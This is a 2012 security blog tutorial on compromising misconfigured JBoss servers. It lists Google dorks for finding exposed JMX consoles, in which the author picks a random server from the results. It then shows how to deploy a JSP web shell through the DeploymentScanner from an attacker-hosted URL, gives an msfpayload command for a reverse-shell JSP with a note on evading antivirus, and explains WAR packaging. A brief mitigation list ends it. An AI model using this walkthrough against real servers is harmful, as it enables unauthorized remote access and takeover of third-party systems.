Hacking

JBOSS Exploitation

Hari Krishnan
August 20, 2012 by
Hari Krishnan

JBoss Application Server is an open-source Java EE-based application server. JBoss is widely used and is deployed by many organizations on their web servers. There are various vulnerabilities and bugs have been found on JBoss, but today we will have a look at one of the most critical bug in the JBoss application that can be used widely.

If Jboss is not configured properly, it can allow attackers to perform various malicious activities. As the JMX console can be accessed remotely usually on port 8080, hackers and malicious users can deploy their own WAR (web archive) file or shells on the server using the DeploymentScanner function in the JBoss console.

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

There are few Google dorks for finding the jmx-console and some of them are

  • intitle:"jboss management console" "application server" version inurl:"web-console"
  • intitle:"JBoss Management Console – Server Information" "application server" inurl:"web-console" OR inurl:"jmx-console"
  • inurl:jmx-console/HtmlAdaptor


Since Most of the JBoss server have default authentication to the jmx-console, there is no restriction to access the console and web management interfaces, which allow attackers to bypass authentication and gain administrative access

Now after searching for jmx-console in Google using one of the dork, we choose one of the random URL and we can access the jmx-console. At the same time, there are few servers which do ask for authentication like the image shown below,


Next step, we need a JSP Shell which can be found again in the internet.

To deploy the malicious file, we will use the DeploymentScanner in the jmx console by adding a new URL where our malicious file is uploaded and the addURL() command can be used to add a new URL with an application or shell and it will be fetch the application from specified URL.

The next step is to wait for the DeploymentScanner to deploy the file and then we will be able to access our shell. Before deploying the shell, we need to upload our shell to a site like for example http://www.malicious website.com/files/cmd.jsp. Next we need to deploy it by accessing the DeploymentScanner in the console. Once the URL is added, we will invoke the function.


In the above image, we have a button to invoke the function. Once finished, the application gives a message of successful operation. While using the JSP shells, it's better to use to metasploit JSP shells since they are more stable when compared to others. To create a jsp shell using metasploit, use the command

root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=8080 R > infosec.jsp

This will generate a jsp shell which can be further modified in order to evade the Anti-virus. Once the shell is uploaded to the server, start the Metasploit multi handler by opening an msfconsole. Access the uploaded shell and you will see a new session in the msfconsole.

If you are planning to upload the jsp shells directly from the console, then you might sometime have to package the malicious jsp file to WAR file. The following instructions should be used to while doing this

  1. Install the most recent Java SDK (may require reboot)

  2. Copy the cmd.jsp to the working directory and make a sub directory named web-inf

  3. Place the content below into the file WEB-INF/web.xml

    <?xml

    version="1.0″ ?>

    <web-app


    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

    xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee

    http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"

    version="2.4″>

    <servlet>

    <servlet-name>Command</servlet-name>

    <jsp-file>/cmd.jsp</jsp-file>

    </servlet>

    </web-app>

    1. In Windows, pack the files into a WAR with the following command,

      "C:Program Files (x86)Javajdk1.6.0_26binjar.exe" cvf cmd.war WEB-INF cmd.jsp

You can also use this exploit by Kingcope in order to exploit the same.

Mitigation:

  • Upgrade to the latest version of Jboss.
  • To disable the JBoss JMX console and web-console by removing the two .war directory named jmx-console.war and web-console.war from the location $JBOSS_HOME/[server]/all/deploy and $JBOSS_HOME/[server]/default/deploy.
  • Also secure the Apache Tomcat manager

Reference:

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

https://www.trustwave.com/downloads/spiderlabs/Trustwave-SpiderLabs-Abusing-Jboss-Papathanasiou.pdf

Hari Krishnan
Hari Krishnan

Hari Krishnan works as a security and bug researcher for a private firm, as well as InfoSec Institute. His interests largely encompass web application security issues. Hari is also an organizer for Defcon Chennai (http://www.defcontn.com).